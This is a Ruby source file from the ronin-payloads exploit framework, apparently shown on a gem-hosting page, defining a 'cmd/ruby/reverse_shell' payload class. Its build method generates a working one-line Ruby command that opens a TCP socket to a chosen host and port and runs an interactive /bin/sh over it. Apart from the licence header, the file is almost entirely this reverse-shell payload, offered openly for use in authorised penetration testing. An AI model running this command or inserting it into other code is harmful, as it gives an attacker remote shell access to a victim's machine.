Sha256: 6453fa6214f840fb3dc1a453fb87ef847d730bb9bec0fb7d37c12a565b6a4cd4
Contents?: true
Size: 1.55 KB
Versions: 5
Compression:
Stored size: 1.55 KB
Contents
# frozen_string_literal: true # # ronin-payloads - A Ruby micro-framework for writing and running exploit # payloads. # # Copyright (c) 2007-2023 Hal Brodigan (postmodern.mod3 at gmail.com) # # ronin-payloads is free software: you can redistribute it and/or modify # it under the terms of the GNU Lesser General Public License as published # by the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # ronin-payloads is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU Lesser General Public License for more details. # # You should have received a copy of the GNU Lesser General Public License # along with ronin-payloads. If not, see <https://www.gnu.org/licenses/>. # require 'ronin/payloads/command_payload' require 'ronin/payloads/mixins/reverse_shell' module Ronin module Payloads module CMD module Ruby # # A basic `ruby` reverse shell command. # class ReverseShell < CommandPayload include Mixins::ReverseShell register 'cmd/ruby/reverse_shell' description <<~DESC A basic `ruby` reverse shell command. DESC # # Builds the `ruby` reverse shell command. # def build @payload = %{ruby -rsocket -e'f=TCPSocket.open(#{host.dump},#{port}).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'} end end end end end end
Version data entries
5 entries across 5 versions & 1 rubygems